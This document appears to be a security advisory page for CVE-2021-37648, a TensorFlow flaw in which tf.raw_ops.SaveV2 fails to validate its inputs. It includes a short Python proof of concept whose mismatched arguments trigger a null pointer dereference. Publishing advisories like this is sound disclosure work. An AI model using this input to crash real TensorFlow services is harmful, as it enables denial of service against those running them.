CVE-2021-37648: Incorrect validation of `SaveV2` inputs
(updated )
The code for tf.raw_ops.SaveV2
does not properly validate the inputs and an attacker can trigger a null pointer dereference:
import tensorflow as tf
tf.raw_ops.SaveV2(
prefix=['tensorflow'],
tensor_name=['v'],
shape_and_slices=[],
tensors=[1,2,3])
References
- github.com/advisories/GHSA-wp77-4gmm-7cq8
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-561.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-759.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-270.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/9728c60e136912a12d99ca56e106b7cce7af5986
- github.com/tensorflow/tensorflow/security/advisories/GHSA-wp77-4gmm-7cq8
- nvd.nist.gov/vuln/detail/CVE-2021-37648
Detect and mitigate CVE-2021-37648 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →